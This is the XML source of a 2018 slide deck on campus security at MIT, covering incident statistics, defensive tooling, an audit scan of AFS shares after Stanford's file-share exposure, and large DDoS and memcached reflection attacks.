                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>Spam filtering; </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>Two-factor-authentication (Duo)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Semi-automated review of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activity logs (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
                        <a:t>Splunk</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>); Reports from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Quarantine the malicious IP address;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>Identify victims through logs (Bro);</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>Suspend accounts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Website Defacements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2 incidents; </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="953735"/>
                          </a:solidFill>
                        </a:rPr>
                      </a:b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2 service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28</a:t>
                      </a:r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 incidents;</a:t>
                      </a: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academic, 10 service 10, 8 research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15 incidents; 11 academic &amp; 4 research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Vulnerability scanning (Nessus)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Reports from REN-ISAC &amp;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Identify system owner and notify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Control System Breaches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0 incidents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1 incident </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="953735"/>
                          </a:solidFill>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="953735"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(EHS video monitoring of the reactor) </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="953735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953735"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>0 incidents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Network segmentation; Vulnerability scanning; Penetration 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Intrusion detection systems (Sourcefire, Bro); Review activity logs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Isolate from public internet; reset passwords; restore configuration settings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431912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ABD1E2-3A9F-E343-A438-B7938813DB8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-84318" y="1356095"/>
            <a:ext cx="137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Incident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EEE4E-560D-8944-BDED-646D98BEA97A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5298549" y="1296303"/>
            <a:ext cx="1209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Protection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643D2-0D14-C44E-ABAD-DD3D71B6FD3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6396351" y="1296303"/>
            <a:ext cx="138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Detection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B3FA1-0124-704D-ACE5-BCB6491C5E74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7503848" y="1292342"/>
            <a:ext cx="136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73AB8-215E-F74B-9038-D113F39200C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2631342" y="1333137"/>
            <a:ext cx="135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CAF0A-FFC4-2840-9F98-86FCB3EBD086}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3942714" y="1317199"/>
            <a:ext cx="135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2016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CA9CF-1314-344C-9E59-053F5EC5663F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1223467" y="1341920"/>
            <a:ext cx="135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2018 Q1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="84098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0BB-DC7C-2243-AC4C-CE20EBD1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Breach - Stanford AFS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F202-C07C-604C-98CB-3B68C94A3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933" y="1837501"/>
            <a:ext cx="6603182" cy="4468296"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>December 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSNs and salary information for nearly 10,000 Stanford employees, confidential information on sexual assault reports, and more </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Accessible due to misconfigured file share permissions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4F076-F989-3846-B7CF-27B083733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4" y="2041556"/>
            <a:ext cx="1720913" cy="17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9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DD32-7831-6849-9E3B-9A988C8C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MIT’s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BA59B-7C80-6D45-8D6A-DC3D8D501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Scanned publicly accessible AFS folders for SSNs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>system:anyuser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> OR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>system:authuser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> read</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First run discovered ~10 SSNs exposed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Daily scans running on incremental data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Email to the community on February 26</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More FAQs on the IS&amp;T Knowledge Base</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30266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Distributed Denial of Service (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) Mitigation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Akamai </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Prolexic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88763" y="1870365"/>
          <a:ext cx="7481455" cy="498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38457" y="3579092"/>
            <a:ext cx="264390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295.6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Gbps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attack on June 7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> held Akamai’s record for largest  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> mitigation, until June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Akamai notes a 71% increase in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attacks between Q3 2015 and Q3 2016 across all industries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7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June </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Campaign</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0"/>
              <a:t>June 7, 2016 5:48pm EST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="3100" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0"/>
              <a:t> June 8, 2016 12:04pm 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06456"/>
            <a:ext cx="8229600" cy="2297545"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>295.6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Gbps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,  58.6 M packets per second</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kaiten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Botnet, 14 flood types, 18k sources of traffic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Dd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029324"/>
            <a:ext cx="9028176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9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4712B-798D-034C-B6E5-CF0FC150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Memcached</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> DDoS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005CD-CB17-9549-926B-D7863AADA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 2018</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UDP-based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>memcached</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>memcache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> protocol was never meant to be exposed to the Internet, but up to 50,000 vulnerable systems exposed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1-500 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Gbps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> per reflector</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2 reflectors at MIT </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1802542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2504</TotalTime>
  <Words>1732</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>185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Mangal</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Security at MIT</vt:lpstr>
      <vt:lpstr>Security at MIT</vt:lpstr>
      <vt:lpstr>Security Incidents</vt:lpstr>
      <vt:lpstr>Security Incidents</vt:lpstr>
      <vt:lpstr>Data Breach - Stanford AFS</vt:lpstr>
      <vt:lpstr>MIT’s Response</vt:lpstr>
      <vt:lpstr>Distributed Denial of Service (DDoS) Mitigation – Akamai Prolexic</vt:lpstr>
      <vt:lpstr>June DDoS Campaign June 7, 2016 5:48pm EST – June 8, 2016 12:04pm EST</vt:lpstr>
      <vt:lpstr>Memcached DDoS</vt:lpstr>
      <vt:lpstr>Malicious traffic – Source/Dest</vt:lpstr>
      <vt:lpstr>Malicious traffic– Campus Targets</vt:lpstr>
      <vt:lpstr>Crypto-mining attempt</vt:lpstr>
      <vt:lpstr>Crypto-mining attempt</vt:lpstr>
      <vt:lpstr>Crypto-mining attempt</vt:lpstr>
      <vt:lpstr>Ransomware - WannaCry at MIT</vt:lpstr>
      <vt:lpstr>Phishing Example</vt:lpstr>
      <vt:lpstr>Phishing Example</vt:lpstr>
      <vt:lpstr>Maldoc: CrowdStrike v Sophos AV</vt:lpstr>
      <vt:lpstr>Next Generation MITnet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Murray</dc:creator>
  <cp:lastModifiedBy>Jessica Murray</cp:lastModifiedBy>
  <cp:revision>29</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-05-12T23:13:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-05-15T20:42:04Z</dcterms:modified>
</cp:coreProperties>
</file>